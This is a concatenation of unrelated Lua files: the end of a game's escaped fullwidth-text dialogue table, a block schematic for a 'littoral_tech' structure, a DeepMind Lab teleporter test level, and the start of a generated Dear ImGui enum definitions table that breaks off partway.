["momaSharesFanatic6"] = "\239\188\183\239\188\175\239\188\183. $1 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\133\239\189\132! \239\188\180\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\137\239\189\142\239\189\131\239\189\146\239\189\133\239\189\132\239\189\137\239\189\130\239\189\140\239\189\133! \239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\151\239\189\133\239\189\140\239\189\140 \239\189\143\239\189\142 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\137\239\189\142\239\189\135 \239\189\129 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\135\239\189\149\239\189\146\239\189\149.",
["portetherCafeHost"] = "\239\188\168\239\189\133\239\189\153 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133, \239\189\151\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 .\239\188\163\239\189\143\239\189\134\239\189\134\239\189\133\239\189\133, \239\189\129 \239\189\136\239\189\129\239\189\142\239\189\135\239\189\143\239\189\149\239\189\148 \239\189\134\239\189\143\239\189\146 \239\189\131\239\189\143\239\189\132\239\189\133\239\189\146\239\189\147.",
["Alex"] = "\239\188\161\239\189\140\239\189\133\239\189\152",
["momaSharesFanatic2"] = "\239\188\175\239\189\136 \239\189\132\239\189\133\239\189\129\239\189\146... \239\189\129\239\189\142 \239\189\129\239\189\146\239\189\148\239\189\137\239\189\147\239\189\148 \239\189\143\239\189\134 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\147\239\189\139\239\189\137\239\189\140\239\189\140 \239\189\129\239\189\142\239\189\132 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\142\239\189\143\239\189\148 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\133\239\189\132 \239\189\129 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\135. \239\188\183\239\189\136\239\189\153 \239\189\142\239\189\143\239\189\148 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\133 \239\189\129 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146\239\189\144\239\189\137\239\189\133\239\189\131\239\189\133 \239\189\142\239\189\143\239\189\151?",
["momaSharesFanatic3"] = "\239\188\167\239\189\143\239\189\143\239\189\132 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135. \239\188\185\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\133\239\189\132 1 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\142\239\189\140\239\189\137\239\189\142\239\189\133. \239\188\171\239\189\133\239\189\133\239\189\144 \239\189\143\239\189\142 \239\189\141\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135!",
["underConstruction"] = "\239\188\181\239\189\142\239\189\132\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142",
["makeArtQuestTitle2"] = "\239\188\169\239\189\142\239\189\148\239\189\133\239\189\146\239\189\141\239\189\133\239\189\132\239\189\137\239\189\129\239\189\148\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148",
["llSignpost"] = "\239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\172\239\189\129\239\189\139\239\189\133 - \239\188\168\239\189\143\239\189\141\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131\239\189\137\239\189\129\239\189\142\239\189\147",
["Twin2"] = "\239\188\165\239\189\140",
["Twin1"] = "\239\188\176\239\189\137\239\189\152",
["makeArtQuizIncorrect"] = "\239\188\169\239\189\142\239\189\131\239\189\143\239\189\146\239\189\146\239\189\133\239\189\131\239\189\148. \239\188\180\239\189\146\239\189\153 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\129\239\189\142\239\189\147\239\189\151\239\189\133\239\189\146.",
["portetherMayor1"] = "\239\188\161 \239\189\147\239\189\148\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\147\239\189\133\239\189\133\239\189\142 \239\189\131\239\189\143\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\149\239\189\148 \239\189\143\239\189\134 \239\189\129 \239\189\136\239\189\143\239\189\149\239\189\147\239\189\133 \239\189\142\239\189\133\239\189\129\239\189\146 \239\189\148\239\189\136\239\189\133 \239\188\161\239\189\149\239\189\132\239\189\137\239\189\143 \239\188\170\239\189\129\239\189\131\239\189\139 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\137\239\189\142\239\189\135.",
["portetherMayor2"] = "\239\188\169 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\188\169 \239\189\147\239\189\129\239\189\151 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\136\239\189\133\239\189\129\239\189\132 \239\189\148\239\189\143 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133.",
["cCode"] = "\239\188\180\239\189\136\239\189\133 \239\189\140\239\189\143\239\189\151-\239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\147\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\149\239\189\144\239\189\144\239\189\143\239\189\146\239\189\148\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\147\239\189\131\239\189\136\239\189\133\239\189\132\239\189\149\239\189\140\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\146\239\189\143\239\189\140 \239\189\144\239\189\133\239\189\146\239\189\137\239\189\144\239\189\136\239\189\133\239\189\146\239\189\129\239\189\140\239\189\147.",
["portetherSeriousGirl"] = "\239\188\180\239\189\136\239\189\133 \239\188\169\239\189\142\239\189\148\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148 \239\189\131\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148\239\189\147 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\130\239\189\137\239\189\140\239\189\140\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\143\239\189\134 \239\189\143\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132!",
["LogicLakeNerdHelp5"] = "\239\188\178\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\148\239\189\149\239\189\132\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\142 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133 \239\188\179\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140.",
["LogicLakeNerdHelp4"] = "\239\188\167\239\189\143 \239\189\148\239\189\143 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\140\239\189\137\239\189\130\239\189\146\239\189\129\239\189\146\239\189\153 \239\189\148\239\189\143 \239\189\137\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\140\239\189\135\239\189\143\239\189\146\239\189\137\239\189\148\239\189\136\239\189\141\239\189\147.",
["jungleAsterixQuestComplete"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\144\239\189\129\239\189\146\239\189\129\239\189\141\239\189\133\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133.",
["LogicLakeNerdHelp2"] = "\239\188\166\239\189\137\239\189\142\239\189\132 \239\189\129 \239\189\130\239\189\143\239\189\143\239\189\139 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\151\239\189\137\239\189\142\239\189\147' \239\189\136\239\189\143\239\189\149\239\189\147\239\189\133 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133.",
["LogicLakeNerdHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\148\239\189\149\239\189\132\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\142 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133 \239\188\179\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140.",
["momaReception"] = "\239\188\183\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148. \239\188\180\239\189\129\239\189\139\239\189\133 \239\189\129 \239\189\140\239\189\143\239\189\143\239\189\139 \239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\129\239\189\148\239\189\133\239\189\147\239\189\148 \239\189\147\239\189\148\239\189\129\239\189\134\239\189\134 \239\189\144\239\189\137\239\189\131\239\189\139\239\189\147 \239\189\143\239\189\142 \239\189\132\239\189\137\239\189\147\239\189\144\239\189\140\239\189\129\239\189\153.",
["cafeHostess"] = "\239\188\163\239\189\143\239\189\134\239\189\134\239\189\133\239\189\133 \239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148 \239\188\166\239\189\129\239\189\142",
["House01Girl"] = "\239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\149\239\189\142\239\189\137\239\189\148 \239\189\143\239\189\134 \239\189\131\239\189\143\239\189\140\239\189\143\239\189\146 \239\189\143\239\189\142 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\132\239\189\137\239\189\147\239\189\144\239\189\140\239\189\129\239\189\153? \239\188\165\239\189\150\239\189\133\239\189\146\239\189\153 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140 \239\189\137\239\189\147 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\149\239\189\144 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\146\239\189\133\239\189\133 \239\189\131\239\189\143\239\189\140\239\189\143\239\189\146\239\189\147: \239\188\178\239\189\133\239\189\132 \239\188\167\239\189\146\239\189\133\239\189\133\239\189\142 \239\189\129\239\189\142\239\189\132 \239\188\162\239\189\140\239\189\149\239\189\133.",
} |
littoral.schematic = {}
local n1 = { name = "air" }
local n2 = { name = "littoral_tech:hal1" }
local n3 = { name = "littoral_tech:ramp", param2 = 2 }
local n4 = { name = "littoral_tech:ramp_corner", param2 = 2 }
local n5 = { name = "littoral_tech:ramp_corner", param2 = 1 }
local n6 = { name = "littoral_tech:ramp", param2 = 3 }
local n7 = { name = "littoral_tech:ramp", param2 = 25 }
local n8 = { name = "littoral_tech:spiker", param2 = 3 }
local n9 = { name = "littoral_tech:ramp_corner", param2 = 3 }
local n10 = { name = "littoral_tech:ramp_corner", param2 = 24 }
local n11 = { name = "littoral_tech:ramp", param2 = 24 }
littoral.schematic.ikaite1 = {
yslice_prob = {
},
size = {
y = 8,
x = 5,
z = 5
}
,
data = {
n1, n1, n2, n1, n1, n1, n1, n2, n1, n1, n1, n1, n3, n1, n1, n1, n1,
n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1,
n1, n1, n1, n1, n1, n1, n1, n2, n2, n2, n1, n1, n2, n2, n2, n1, n1,
n2, n2, n2, n1, n1, n4, n2, n5, n1, n1, n1, n2, n1, n1, n1, n1, n2,
n1, n1, n1, n1, n3, n1, n1, n1, n1, n1, n1, n1, n2, n2, n2, n2, n2,
n2, n2, n2, n2, n2, n6, n2, n2, n2, n7, n1, n2, n2, n2, n1, n1, n2,
n2, n2, n1, n1, n2, n2, n2, n1, n1, n6, n2, n7, n1, n1, n1, n8, n1,
n1, n1, n2, n2, n2, n1, n1, n2, n2, n2, n1, n1, n2, n2, n2, n1, n1,
n9, n2, n10, n1, n1, n1, n2, n1, n1, n1, n1, n2, n1, n1, n1, n1, n11,
n1, n1, n1, n1, n1, n1, n1, n1, n1, n2, n1, n1, n1, n1, n2, n1, n1,
n1, n1, n11, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1,
n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1, n1,
}
} |
--[[ Copyright (C) 2018 Google Inc.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
]]
local events = require 'dmlab.system.events'
local game = require 'dmlab.system.game'
local maze_generation = require 'dmlab.system.maze_generation'
local custom_entities = require 'common.custom_entities'
local make_map = require 'common.make_map'
local custom_observations = require 'decorators.custom_observations'
local timeout = require 'decorators.timeout'
local api = {}
local MAP_ENTITIES = '*********\n' ..
'* P * t *\n' ..
'* * *\n' ..
'* T * *\n' ..
'*********\n'
function api:init(params)
make_map.seedRng(1)
local maze = maze_generation.mazeGeneration{entity = MAP_ENTITIES}
api._map = make_map.makeMap{
mapName = "teleport_test",
mapEntityLayer = MAP_ENTITIES,
useSkybox = true,
callback = function (i, j, c, maker)
if c == 'T' then
return custom_entities.makeTeleporter(
{maze:toWorldPos(i + 1, j + 1)},
'teleporter_dest_second_room')
end
if c == 't' then
return custom_entities.makeTeleporterTarget(
{maze:toWorldPos(i + 1, j + 1)},
'teleporter_dest_second_room')
end
end
}
end
function api:hasEpisodeFinished(time)
if game:playerInfo().teleported then
events:add("PLAYER_TELEPORTED")
end
return false
end
function api:nextMap()
return self._map
end
function api:updateSpawnVars(spawnVars)
if spawnVars.classname == "info_player_start" then
-- Spawn facing South.
spawnVars.angle = "-90"
spawnVars.randomAngleRange = "0"
end
return spawnVars
end
timeout.decorate(api, 60 * 60)
custom_observations.decorate(api)
return api
|
local defs = {}
defs["enums"] = {}
defs["enums"]["ImDrawFlags_"] = {}
defs["enums"]["ImDrawFlags_"][1] = {}
defs["enums"]["ImDrawFlags_"][1]["calc_value"] = 0
defs["enums"]["ImDrawFlags_"][1]["name"] = "ImDrawFlags_None"
defs["enums"]["ImDrawFlags_"][1]["value"] = "0"
defs["enums"]["ImDrawFlags_"][2] = {}
defs["enums"]["ImDrawFlags_"][2]["calc_value"] = 1
defs["enums"]["ImDrawFlags_"][2]["name"] = "ImDrawFlags_Closed"
defs["enums"]["ImDrawFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImDrawFlags_"][3] = {}
defs["enums"]["ImDrawFlags_"][3]["calc_value"] = 16
defs["enums"]["ImDrawFlags_"][3]["name"] = "ImDrawFlags_RoundCornersTopLeft"
defs["enums"]["ImDrawFlags_"][3]["value"] = "1 << 4"
defs["enums"]["ImDrawFlags_"][4] = {}
defs["enums"]["ImDrawFlags_"][4]["calc_value"] = 32
defs["enums"]["ImDrawFlags_"][4]["name"] = "ImDrawFlags_RoundCornersTopRight"
defs["enums"]["ImDrawFlags_"][4]["value"] = "1 << 5"
defs["enums"]["ImDrawFlags_"][5] = {}
defs["enums"]["ImDrawFlags_"][5]["calc_value"] = 64
defs["enums"]["ImDrawFlags_"][5]["name"] = "ImDrawFlags_RoundCornersBottomLeft"
defs["enums"]["ImDrawFlags_"][5]["value"] = "1 << 6"
defs["enums"]["ImDrawFlags_"][6] = {}
defs["enums"]["ImDrawFlags_"][6]["calc_value"] = 128
defs["enums"]["ImDrawFlags_"][6]["name"] = "ImDrawFlags_RoundCornersBottomRight"
defs["enums"]["ImDrawFlags_"][6]["value"] = "1 << 7"
defs["enums"]["ImDrawFlags_"][7] = {}
defs["enums"]["ImDrawFlags_"][7]["calc_value"] = 256
defs["enums"]["ImDrawFlags_"][7]["name"] = "ImDrawFlags_RoundCornersNone"
defs["enums"]["ImDrawFlags_"][7]["value"] = "1 << 8"
defs["enums"]["ImDrawFlags_"][8] = {}
defs["enums"]["ImDrawFlags_"][8]["calc_value"] = 48
defs["enums"]["ImDrawFlags_"][8]["name"] = "ImDrawFlags_RoundCornersTop"
defs["enums"]["ImDrawFlags_"][8]["value"] = "ImDrawFlags_RoundCornersTopLeft | ImDrawFlags_RoundCornersTopRight"
defs["enums"]["ImDrawFlags_"][9] = {}
defs["enums"]["ImDrawFlags_"][9]["calc_value"] = 192
defs["enums"]["ImDrawFlags_"][9]["name"] = "ImDrawFlags_RoundCornersBottom"
defs["enums"]["ImDrawFlags_"][9]["value"] = "ImDrawFlags_RoundCornersBottomLeft | ImDrawFlags_RoundCornersBottomRight"
defs["enums"]["ImDrawFlags_"][10] = {}
defs["enums"]["ImDrawFlags_"][10]["calc_value"] = 80
defs["enums"]["ImDrawFlags_"][10]["name"] = "ImDrawFlags_RoundCornersLeft"
defs["enums"]["ImDrawFlags_"][10]["value"] = "ImDrawFlags_RoundCornersBottomLeft | ImDrawFlags_RoundCornersTopLeft"
defs["enums"]["ImDrawFlags_"][11] = {}
defs["enums"]["ImDrawFlags_"][11]["calc_value"] = 160
defs["enums"]["ImDrawFlags_"][11]["name"] = "ImDrawFlags_RoundCornersRight"
defs["enums"]["ImDrawFlags_"][11]["value"] = "ImDrawFlags_RoundCornersBottomRight | ImDrawFlags_RoundCornersTopRight"
defs["enums"]["ImDrawFlags_"][12] = {}
defs["enums"]["ImDrawFlags_"][12]["calc_value"] = 240
defs["enums"]["ImDrawFlags_"][12]["name"] = "ImDrawFlags_RoundCornersAll"
defs["enums"]["ImDrawFlags_"][12]["value"] = "ImDrawFlags_RoundCornersTopLeft | ImDrawFlags_RoundCornersTopRight | ImDrawFlags_RoundCornersBottomLeft | ImDrawFlags_RoundCornersBottomRight"
defs["enums"]["ImDrawFlags_"][13] = {}
defs["enums"]["ImDrawFlags_"][13]["calc_value"] = 240
defs["enums"]["ImDrawFlags_"][13]["name"] = "ImDrawFlags_RoundCornersDefault_"
defs["enums"]["ImDrawFlags_"][13]["value"] = "ImDrawFlags_RoundCornersAll"
defs["enums"]["ImDrawFlags_"][14] = {}
defs["enums"]["ImDrawFlags_"][14]["calc_value"] = 496
defs["enums"]["ImDrawFlags_"][14]["name"] = "ImDrawFlags_RoundCornersMask_"
defs["enums"]["ImDrawFlags_"][14]["value"] = "ImDrawFlags_RoundCornersAll | ImDrawFlags_RoundCornersNone"
defs["enums"]["ImDrawListFlags_"] = {}
defs["enums"]["ImDrawListFlags_"][1] = {}
defs["enums"]["ImDrawListFlags_"][1]["calc_value"] = 0
defs["enums"]["ImDrawListFlags_"][1]["name"] = "ImDrawListFlags_None"
defs["enums"]["ImDrawListFlags_"][1]["value"] = "0"
defs["enums"]["ImDrawListFlags_"][2] = {}
defs["enums"]["ImDrawListFlags_"][2]["calc_value"] = 1
defs["enums"]["ImDrawListFlags_"][2]["name"] = "ImDrawListFlags_AntiAliasedLines"
defs["enums"]["ImDrawListFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImDrawListFlags_"][3] = {}
defs["enums"]["ImDrawListFlags_"][3]["calc_value"] = 2
defs["enums"]["ImDrawListFlags_"][3]["name"] = "ImDrawListFlags_AntiAliasedLinesUseTex"
defs["enums"]["ImDrawListFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImDrawListFlags_"][4] = {}
defs["enums"]["ImDrawListFlags_"][4]["calc_value"] = 4
defs["enums"]["ImDrawListFlags_"][4]["name"] = "ImDrawListFlags_AntiAliasedFill"
defs["enums"]["ImDrawListFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImDrawListFlags_"][5] = {}
defs["enums"]["ImDrawListFlags_"][5]["calc_value"] = 8
defs["enums"]["ImDrawListFlags_"][5]["name"] = "ImDrawListFlags_AllowVtxOffset"
defs["enums"]["ImDrawListFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImFontAtlasFlags_"] = {}
defs["enums"]["ImFontAtlasFlags_"][1] = {}
defs["enums"]["ImFontAtlasFlags_"][1]["calc_value"] = 0
defs["enums"]["ImFontAtlasFlags_"][1]["name"] = "ImFontAtlasFlags_None"
defs["enums"]["ImFontAtlasFlags_"][1]["value"] = "0"
defs["enums"]["ImFontAtlasFlags_"][2] = {}
defs["enums"]["ImFontAtlasFlags_"][2]["calc_value"] = 1
defs["enums"]["ImFontAtlasFlags_"][2]["name"] = "ImFontAtlasFlags_NoPowerOfTwoHeight"
defs["enums"]["ImFontAtlasFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImFontAtlasFlags_"][3] = {}
defs["enums"]["ImFontAtlasFlags_"][3]["calc_value"] = 2
defs["enums"]["ImFontAtlasFlags_"][3]["name"] = "ImFontAtlasFlags_NoMouseCursors"
defs["enums"]["ImFontAtlasFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImFontAtlasFlags_"][4] = {}
defs["enums"]["ImFontAtlasFlags_"][4]["calc_value"] = 4
defs["enums"]["ImFontAtlasFlags_"][4]["name"] = "ImFontAtlasFlags_NoBakedLines"
defs["enums"]["ImFontAtlasFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiBackendFlags_"] = {}
defs["enums"]["ImGuiBackendFlags_"][1] = {}
defs["enums"]["ImGuiBackendFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiBackendFlags_"][1]["name"] = "ImGuiBackendFlags_None"
defs["enums"]["ImGuiBackendFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiBackendFlags_"][2] = {}
defs["enums"]["ImGuiBackendFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiBackendFlags_"][2]["name"] = "ImGuiBackendFlags_HasGamepad"
defs["enums"]["ImGuiBackendFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiBackendFlags_"][3] = {}
defs["enums"]["ImGuiBackendFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiBackendFlags_"][3]["name"] = "ImGuiBackendFlags_HasMouseCursors"
defs["enums"]["ImGuiBackendFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiBackendFlags_"][4] = {}
defs["enums"]["ImGuiBackendFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiBackendFlags_"][4]["name"] = "ImGuiBackendFlags_HasSetMousePos"
defs["enums"]["ImGuiBackendFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiBackendFlags_"][5] = {}
defs["enums"]["ImGuiBackendFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiBackendFlags_"][5]["name"] = "ImGuiBackendFlags_RendererHasVtxOffset"
defs["enums"]["ImGuiBackendFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiButtonFlags_"] = {}
defs["enums"]["ImGuiButtonFlags_"][1] = {}
defs["enums"]["ImGuiButtonFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiButtonFlags_"][1]["name"] = "ImGuiButtonFlags_None"
defs["enums"]["ImGuiButtonFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiButtonFlags_"][2] = {}
defs["enums"]["ImGuiButtonFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiButtonFlags_"][2]["name"] = "ImGuiButtonFlags_MouseButtonLeft"
defs["enums"]["ImGuiButtonFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiButtonFlags_"][3] = {}
defs["enums"]["ImGuiButtonFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiButtonFlags_"][3]["name"] = "ImGuiButtonFlags_MouseButtonRight"
defs["enums"]["ImGuiButtonFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiButtonFlags_"][4] = {}
defs["enums"]["ImGuiButtonFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiButtonFlags_"][4]["name"] = "ImGuiButtonFlags_MouseButtonMiddle"
defs["enums"]["ImGuiButtonFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiButtonFlags_"][5] = {}
defs["enums"]["ImGuiButtonFlags_"][5]["calc_value"] = 7
defs["enums"]["ImGuiButtonFlags_"][5]["name"] = "ImGuiButtonFlags_MouseButtonMask_"
defs["enums"]["ImGuiButtonFlags_"][5]["value"] = "ImGuiButtonFlags_MouseButtonLeft | ImGuiButtonFlags_MouseButtonRight | ImGuiButtonFlags_MouseButtonMiddle"
defs["enums"]["ImGuiButtonFlags_"][6] = {}
defs["enums"]["ImGuiButtonFlags_"][6]["calc_value"] = 1
defs["enums"]["ImGuiButtonFlags_"][6]["name"] = "ImGuiButtonFlags_MouseButtonDefault_"
defs["enums"]["ImGuiButtonFlags_"][6]["value"] = "ImGuiButtonFlags_MouseButtonLeft"
defs["enums"]["ImGuiCol_"] = {}
defs["enums"]["ImGuiCol_"][1] = {}
defs["enums"]["ImGuiCol_"][1]["calc_value"] = 0
defs["enums"]["ImGuiCol_"][1]["name"] = "ImGuiCol_Text"
defs["enums"]["ImGuiCol_"][1]["value"] = "0"
defs["enums"]["ImGuiCol_"][2] = {}
defs["enums"]["ImGuiCol_"][2]["calc_value"] = 1
defs["enums"]["ImGuiCol_"][2]["name"] = "ImGuiCol_TextDisabled"
defs["enums"]["ImGuiCol_"][2]["value"] = "1"
defs["enums"]["ImGuiCol_"][3] = {}
defs["enums"]["ImGuiCol_"][3]["calc_value"] = 2
defs["enums"]["ImGuiCol_"][3]["name"] = "ImGuiCol_WindowBg"
defs["enums"]["ImGuiCol_"][3]["value"] = "2"
defs["enums"]["ImGuiCol_"][4] = {}
defs["enums"]["ImGuiCol_"][4]["calc_value"] = 3
defs["enums"]["ImGuiCol_"][4]["name"] = "ImGuiCol_ChildBg"
defs["enums"]["ImGuiCol_"][4]["value"] = "3"
defs["enums"]["ImGuiCol_"][5] = {}
defs["enums"]["ImGuiCol_"][5]["calc_value"] = 4
defs["enums"]["ImGuiCol_"][5]["name"] = "ImGuiCol_PopupBg"
defs["enums"]["ImGuiCol_"][5]["value"] = "4"
defs["enums"]["ImGuiCol_"][6] = {}
defs["enums"]["ImGuiCol_"][6]["calc_value"] = 5
defs["enums"]["ImGuiCol_"][6]["name"] = "ImGuiCol_Border"
defs["enums"]["ImGuiCol_"][6]["value"] = "5"
defs["enums"]["ImGuiCol_"][7] = {}
defs["enums"]["ImGuiCol_"][7]["calc_value"] = 6
defs["enums"]["ImGuiCol_"][7]["name"] = "ImGuiCol_BorderShadow"
defs["enums"]["ImGuiCol_"][7]["value"] = "6"
defs["enums"]["ImGuiCol_"][8] = {}
defs["enums"]["ImGuiCol_"][8]["calc_value"] = 7
defs["enums"]["ImGuiCol_"][8]["name"] = "ImGuiCol_FrameBg"
defs["enums"]["ImGuiCol_"][8]["value"] = "7"
defs["enums"]["ImGuiCol_"][9] = {}
defs["enums"]["ImGuiCol_"][9]["calc_value"] = 8
defs["enums"]["ImGuiCol_"][9]["name"] = "ImGuiCol_FrameBgHovered"
defs["enums"]["ImGuiCol_"][9]["value"] = "8"
defs["enums"]["ImGuiCol_"][10] = {}
defs["enums"]["ImGuiCol_"][10]["calc_value"] = 9
defs["enums"]["ImGuiCol_"][10]["name"] = "ImGuiCol_FrameBgActive"
defs["enums"]["ImGuiCol_"][10]["value"] = "9"
